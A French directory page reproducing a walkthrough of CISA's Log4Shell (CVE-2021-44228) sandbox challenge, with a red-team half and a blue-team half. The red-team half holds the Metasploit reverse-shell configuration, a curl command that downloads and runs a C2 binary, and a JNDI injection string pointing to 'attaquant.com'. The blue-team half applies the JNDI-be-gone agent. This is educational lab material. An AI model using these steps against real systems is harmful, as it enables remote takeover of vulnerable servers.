Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Sandbox-Challenge-Log4Shell-CVE-2021-44228- — Guide pas à pas du défi sandbox Log4Shell de la CISA, couvrant l'exploitation offensive via Metasploit et la mitigation défensive à l'aide d'un agent Java JNDI-be-gone. | Kitploit
Outils/GitHubGitHub/felisha-elmer/sandbox-challenge-log4shell-cve-2021-44228-
Outils DéfensifsAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationRed TeamingRéponse aux IncidentsLabs et Pratique
GitHub
felisha-elmer/sandbox-challenge-log4shell-cve-2021-44228-

Sandbox-Challenge-Log4Shell-CVE-2021-44228-

Guide pas à pas du défi sandbox Log4Shell de la CISA, couvrant l'exploitation offensive via Metasploit et la mitigation défensive à l'aide d'un agent Java JNDI-be-gone.

Voir le dépôt
6il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Défi Sandbox : Log4Shell (CVE-2021-44228)

Aperçu

Cette procédure pas à pas documente les étapes suivies pour réaliser le Défi Sandbox de Menaces de la CISA pour CVE-2021-44228, communément appelé Log4Shell. Le défi impliquait la réalisation de deux objectifs — un pour l'équipe rouge (offensif) et un pour l'équipe bleue (défensif) — contre un fournisseur de services gérés (MSP) fictif nommé DasMSP dans un environnement sandbox isolé.

Remarque : Les commandes et chemins de fichiers dans cette procédure reflètent les étapes spécifiques effectuées dans cet environnement. Votre environnement peut différer, y compris les adresses IP, les emplacements de fichiers et la disponibilité des outils. Adaptez les commandes selon votre configuration.


Contexte

CVE-2021-44228 est une vulnérabilité critique d'exécution de code à distance (RCE) (CVSS 10.0) affectant des versions spécifiques du framework de journalisation Java Apache Log4j. La vulnérabilité provient de la fonctionnalité de recherche JNDI de Log4j, qui peut être déclenchée en injectant une chaîne spécialement conçue telle que ${jndi:ldap://attaquant.com/exploit} dans toute donnée que Log4j enregistre. Si un attaquant parvient à faire enregistrer une chaîne malveillante par une application vulnérable — généralement via les en-têtes HTTP — Log4j contactera le serveur contrôlé par l'attaquant et exécutera du code arbitraire.

Log4Shell a été ajouté au catalogue des vulnérabilités connues exploitées (KEV) de la CISA le 10 décembre 2021, et est apparu dans les avis conjoints sur les vulnérabilités les plus fréquemment exploitées pour 2021 et 2022.


Environnement

MachineIP
Security-Desk<Security-Desk-IP>
Cible Rouge<Red-Target-IP>
Cible Bleue<Blue-Target-IP>

Les deux systèmes cibles sont des Linux et exécutent une application web Java vulnérable (dasmsp.jar) utilisant une version affectée de Log4j.


Outils utilisés

  • Metasploit Framework (exploit/multi/http/log4shell_header_injection)
  • curl
  • Serveur HTTP Python3
  • SSH
  • SCP
  • systemctl
  • nano

Objectif de l'équipe rouge : Déployer l'écouteur C2 sur la Cible Rouge

Étape 1 — Lancer Metasploit

Ouvrez un terminal sur le Security-Desk et lancez Metasploit :

root@kitploit:~
msfconsole

Étape 2 — Rechercher le module Log4Shell

Le chemin du module fourni dans le briefing ne correspondait pas à la version installée. Recherche du module correct :

root@kitploit:~
search log4shell

Module correct identifié : exploit/multi/http/log4shell_header_injection.

Étape 3 — Configurer l'exploit

root@kitploit:~
use exploit/multi/http/log4shell_header_injection
set RHOSTS <Red-Target-IP>
set RPORT 80
set SRVHOST <Security-Desk-IP>
set PAYLOAD java/shell_reverse_tcp
set LHOST <Security-Desk-IP>

Étape 4 — Exécuter l'exploit

root@kitploit:~
run

Metasploit a automatiquement testé plusieurs en-têtes HTTP pour la vulnérabilité Log4Shell. La Cible Rouge a été confirmée vulnérable sur plusieurs en-têtes (Authorization, Cache-Control, User-Agent, X-Forwarded-For, et autres). Une session de shell de commande a été ouverte sur la Cible Rouge.

Étape 5 — Vérifier l'accès au Shell

Accès root confirmé sur la Cible Rouge :

root@kitploit:~
id

Sortie : uid=0(root) gid=0(root) groups=0(root)

Étape 6 — Transférer et exécuter deploy_c2

Le binaire deploy_c2 se trouvait sur le Security-Desk, pas sur la Cible Rouge. Ni wget ni une référence de chemin direct n'étaient disponibles sur la cible. Ouvrez un deuxième terminal sur le Security-Desk et servez le fichier via Python :

root@kitploit:~
cd ~/Desktop/Resources
python3 -m http.server 8080

De retour dans la session shell Metasploit sur la Cible Rouge, téléchargement et exécution du binaire :

root@kitploit:~
curl http://<Security-Desk-IP>:8080/deploy_c2 -o /tmp/deploy_c2
chmod +x /tmp/deploy_c2
/tmp/deploy_c2

Sortie : Done!

✅ Écouteur C2 déployé sur la Cible Rouge - vérification confirmée.


Objectif de l'équipe bleue : Atténuer CVE-2021-44228 sur la Cible Bleue

La méthode d'atténuation utilisée est l'agent Java log4j-jndi-be-gone-standalone.jar développé par NCC Group, qui corrige le comportement de recherche JNDI au moment de l'exécution sans nécessiter de correctif de l'application sous-jacente. Les détails sur cet agent se trouvent sur le blog de recherche de NCC Group.

Étape 1 — Transférer l'agent Java vers la Cible Bleue

Depuis le terminal du Security-Desk, utilisez SCP pour transférer le fichier JAR de l'agent :

root@kitploit:~
scp ~/Desktop/Resources/log4j-jndi-be-gone-standalone.jar playerone@<Blue-Target-IP>:/tmp/

Étape 2 — Se connecter en SSH à la Cible Bleue

root@kitploit:~
ssh playerone@<Blue-Target-IP>

Étape 3 — Modifier le fichier d'unité de service

root@kitploit:~
sudo nano /etc/systemd/system/dasmsp.service

Localisez la ligne ExecStart et ajoutez le flag -javaagent :

Avant :

root@kitploit:~
ExecStart=/usr/lib/jvm/nvidia-java-8-openjdk-amd64/bin/java -jar /opt/dasmsp.jar

Après :

root@kitploit:~
ExecStart=/usr/lib/jvm/nvidia-java-8-openjdk-amd64/bin/java -javaagent:/tmp/log4j-jndi-be-gone-standalone.jar -jar /opt/dasmsp.jar

Enregistrez avec Ctrl+O → Entrée → Ctrl+X.

Étape 4 — Recharger et redémarrer le service

root@kitploit:~
sudo systemctl daemon-reload
sudo systemctl restart dasmsp

✅ CVE-2021-44228 atténuée sur la Cible Bleue - vérification confirmée.

Télécharger l’outil